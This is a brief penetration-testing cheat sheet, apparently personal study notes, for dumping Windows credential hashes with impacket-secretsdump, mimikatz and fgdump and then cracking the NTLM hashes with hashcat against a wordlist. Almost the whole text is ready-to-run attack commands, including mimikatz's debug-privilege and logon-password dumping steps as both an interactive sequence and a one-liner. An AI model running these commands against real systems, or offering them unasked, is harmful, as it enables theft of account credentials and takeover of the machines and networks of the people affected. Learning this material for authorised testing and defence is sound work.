*Using impacket-secretsdump
impacket-secretsdump "<domain>/<user>:<password>@<ip>"
*Using mimikatz
- Transfer all 3 mimikatz files from /usr/share/windows-resources/mimikatz/ so that mimikatz.exe can run
mimikatz.exe
- Enable the debug privilege
privilege::debug
- Retrieve the password hashes
sekurlsa::logonpasswords
- If mimikatz does not work interactively, try it as a single command
./mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
*Using fgdump
- Transfer from /usr/share/windows-resources/binaries/fgdump/fgdump.exe
- fgdump.exe
- 127.0.0.1.pwdump will have all hashes
*Crack
- hashcat -m 1000 hash rockyou.txt